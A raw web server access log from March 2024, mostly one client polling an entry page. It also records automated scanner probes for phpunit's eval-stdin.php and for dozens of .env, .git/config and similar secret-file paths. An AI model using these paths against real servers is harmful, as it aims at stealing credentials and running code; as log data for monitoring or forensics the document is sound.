91.141.34.48 - - [22/Mar/2024:18:59:12 +0100] "GET /gui/javascript/form_form.js?1711130352 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=130291" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
64.227.74.198 - - [22/Mar/2024:19:00:00 +0100] "\x16\x03\x01" 400 383 "-" "-"
64.227.74.198 - - [22/Mar/2024:19:00:00 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:00:13 +0100] "GET /entry.php?id=10271&&ser=130352 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=130291" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:00:13 +0100] "GET /gui/javascript/form_form.js?1711130413 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=130352" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:01:14 +0100] "GET /entry.php?id=10271&&ser=130413 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=130352" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:01:14 +0100] "GET /gui/javascript/form_form.js?1711130474 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=130413" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:02:15 +0100] "GET /entry.php?id=10271&&ser=130474 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=130413" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:02:15 +0100] "GET /gui/javascript/form_form.js?1711130535 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=130474" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:03:16 +0100] "GET /entry.php?id=10271&&ser=130535 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=130474" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:03:16 +0100] "GET /gui/javascript/form_form.js?1711130596 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=130535" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:04:17 +0100] "GET /entry.php?id=10271&&ser=130596 HTTP/1.1" 200 985 "http://hausegger.activities.at/entry.php?id=10271&&ser=130535" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:04:17 +0100] "GET /gui/javascript/form_form.js?1711130657 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=130596" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
185.170.144.3 - - [22/Mar/2024:19:04:25 +0100] "\x03" 400 383 "-" "-"
91.141.34.48 - - [22/Mar/2024:19:05:18 +0100] "GET /entry.php?id=10271&&ser=130657 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=130596" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:05:18 +0100] "GET /gui/javascript/form_form.js?1711130718 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=130657" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:06:19 +0100] "GET /entry.php?id=10271&&ser=130718 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=130657" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:06:19 +0100] "GET /gui/javascript/form_form.js?1711130779 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=130718" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:07:20 +0100] "GET /entry.php?id=10271&&ser=130779 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=130718" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:07:20 +0100] "GET /gui/javascript/form_form.js?1711130840 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=130779" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:08:21 +0100] "GET /entry.php?id=10271&&ser=130840 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=130779" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:08:21 +0100] "GET /gui/javascript/form_form.js?1711130901 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=130840" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:09:22 +0100] "GET /entry.php?id=10271&&ser=130901 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=130840" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:09:22 +0100] "GET /gui/javascript/form_form.js?1711130962 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=130901" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:10:23 +0100] "GET /entry.php?id=10271&&ser=130962 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=130901" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:10:23 +0100] "GET /gui/javascript/form_form.js?1711131023 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=130962" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
185.224.128.43 - - [22/Mar/2024:19:11:02 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.141.34.48 - - [22/Mar/2024:19:11:24 +0100] "GET /entry.php?id=10271&&ser=131023 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=130962" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:11:24 +0100] "GET /gui/javascript/form_form.js?1711131084 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131023" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:12:25 +0100] "GET /entry.php?id=10271&&ser=131084 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=131023" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:12:25 +0100] "GET /gui/javascript/form_form.js?1711131145 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131084" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:13:26 +0100] "GET /entry.php?id=10271&&ser=131145 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=131084" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:13:26 +0100] "GET /gui/javascript/form_form.js?1711131206 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131145" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:14:27 +0100] "GET /entry.php?id=10271&&ser=131206 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=131145" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:14:27 +0100] "GET /gui/javascript/form_form.js?1711131267 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:15:28 +0100] "GET /entry.php?id=10271&&ser=131267 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=131206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:15:28 +0100] "GET /gui/javascript/form_form.js?1711131328 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131267" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
101.44.249.154 - - [22/Mar/2024:19:15:40 +0100] "GET /gallery/search.php?search_id=random&sid=7bf126ea071b2f23a506d97d28061aef HTTP/1.1" 404 298 "http://triadian.castlegem.co.uk/gallery/search.php?search_id=random&sid=7bf126ea071b2f23a506d97d28061aef" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:16:29 +0100] "GET /entry.php?id=10271&&ser=131328 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=131267" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:16:29 +0100] "GET /gui/javascript/form_form.js?1711131389 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131328" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
136.144.35.45 - - [22/Mar/2024:19:16:51 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.39 - - [22/Mar/2024:19:16:58 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
136.144.35.38 - - [22/Mar/2024:19:17:02 +0100] "POST /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20/vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
136.144.35.54 - - [22/Mar/2024:19:17:06 +0100] "POST /vendor/phpunit/Util/PHP/eval-stdin.php%20/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
136.144.35.60 - - [22/Mar/2024:19:17:12 +0100] "POST /phpunit/phpunit/Util/PHP/eval-stdin.php%20/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
136.144.35.38 - - [22/Mar/2024:19:17:17 +0100] "GET /.git/config HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.58 - - [22/Mar/2024:19:17:22 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.60 - - [22/Mar/2024:19:17:24 +0100] "GET /.DS_Store HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0"
91.141.34.48 - - [22/Mar/2024:19:17:30 +0100] "GET /entry.php?id=10271&&ser=131389 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=131328" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:17:30 +0100] "GET /gui/javascript/form_form.js?1711131450 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131389" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
136.144.35.44 - - [22/Mar/2024:19:17:35 +0100] "GET /.env.save HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.44 - - [22/Mar/2024:19:17:39 +0100] "POST /.env.save HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.55 - - [22/Mar/2024:19:17:41 +0100] "GET /.env.old HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.61 - - [22/Mar/2024:19:17:45 +0100] "POST /.env.old HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.61 - - [22/Mar/2024:19:17:50 +0100] "GET /.env.prod HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
136.144.35.61 - - [22/Mar/2024:19:17:53 +0100] "POST /.env.prod HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
136.144.35.49 - - [22/Mar/2024:19:17:56 +0100] "GET /.env.production HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.55 - - [22/Mar/2024:19:18:00 +0100] "POST /.env.production HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.56 - - [22/Mar/2024:19:18:04 +0100] "GET /.env.development%20 HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.53 - - [22/Mar/2024:19:18:08 +0100] "POST /.env.development%20 HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
136.144.35.41 - - [22/Mar/2024:19:18:16 +0100] "GET /laravel/.env%20 HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.60 - - [22/Mar/2024:19:18:18 +0100] "POST /laravel/.env%20 HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.38 - - [22/Mar/2024:19:18:23 +0100] "GET /admin-app/.env%20 HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.43 - - [22/Mar/2024:19:18:29 +0100] "POST /admin-app/.env%20 HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:18:31 +0100] "GET /entry.php?id=10271&&ser=131450 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=131389" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:18:31 +0100] "GET /gui/javascript/form_form.js?1711131511 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131450" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
136.144.35.50 - - [22/Mar/2024:19:18:31 +0100] "GET /api/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.41 - - [22/Mar/2024:19:18:35 +0100] "POST /api/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.58 - - [22/Mar/2024:19:18:40 +0100] "GET /app/.env%20 HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.34 - - [22/Mar/2024:19:18:47 +0100] "POST /app/.env%20 HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.35 - - [22/Mar/2024:19:18:53 +0100] "GET /development/.env%20 HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.49 - - [22/Mar/2024:19:18:56 +0100] "POST /development/.env%20 HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.41 - - [22/Mar/2024:19:18:59 +0100] "GET /apps/.env%20 HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.38 - - [22/Mar/2024:19:19:01 +0100] "POST /apps/.env%20 HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
136.144.35.42 - - [22/Mar/2024:19:19:05 +0100] "GET /cp/.env HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.54 - - [22/Mar/2024:19:19:07 +0100] "POST /cp/.env HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.51 - - [22/Mar/2024:19:19:12 +0100] "GET /private/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.43 - - [22/Mar/2024:19:19:19 +0100] "POST /private/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.60 - - [22/Mar/2024:19:19:27 +0100] "GET /system/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.55 - - [22/Mar/2024:19:19:31 +0100] "POST /system/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:19:32 +0100] "GET /entry.php?id=10271&&ser=131511 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=131450" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:19:32 +0100] "GET /gui/javascript/form_form.js?1711131572 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131511" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
136.144.35.38 - - [22/Mar/2024:19:19:37 +0100] "GET /redmine/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.59 - - [22/Mar/2024:19:19:45 +0100] "POST /redmine/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.37 - - [22/Mar/2024:19:19:49 +0100] "GET /docker/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.39 - - [22/Mar/2024:19:19:53 +0100] "POST /docker/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
136.144.35.41 - - [22/Mar/2024:19:19:56 +0100] "GET /cms/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
136.144.35.36 - - [22/Mar/2024:19:19:57 +0100] "POST /cms/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.58 - - [22/Mar/2024:19:20:03 +0100] "GET /script/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.58 - - [22/Mar/2024:19:20:07 +0100] "POST /script/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.59 - - [22/Mar/2024:19:20:09 +0100] "GET /live_env%20 HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
136.144.35.54 - - [22/Mar/2024:19:20:15 +0100] "POST /live_env%20 HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.40 - - [22/Mar/2024:19:20:30 +0100] "GET /.env.project%20 HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:20:33 +0100] "GET /entry.php?id=10271&&ser=131572 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=131511" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
91.141.34.48 - - [22/Mar/2024:19:20:33 +0100] "GET /gui/javascript/form_form.js?1711131633 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=131572" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
136.144.35.35 - - [22/Mar/2024:19:20:36 +0100] "GET /.env.dist HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.50 - - [22/Mar/2024:19:20:47 +0100] "POST /.env.dist HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.35 - - [22/Mar/2024:19:20:55 +0100] "GET /back/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.34 - - [22/Mar/2024:19:20:58 +0100] "POST /back/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.36 - - [22/Mar/2024:19:21:04 +0100] "GET /core/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.48 - - [22/Mar/2024:19:21:06 +0100] "POST /core/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
136.144.35.46 - - [22/Mar/2024:19:21:11 +0100] "GET /docker/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
136.144.35.57 - - [22/Mar/2024:19:21:14 +0100] "POST /docker/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
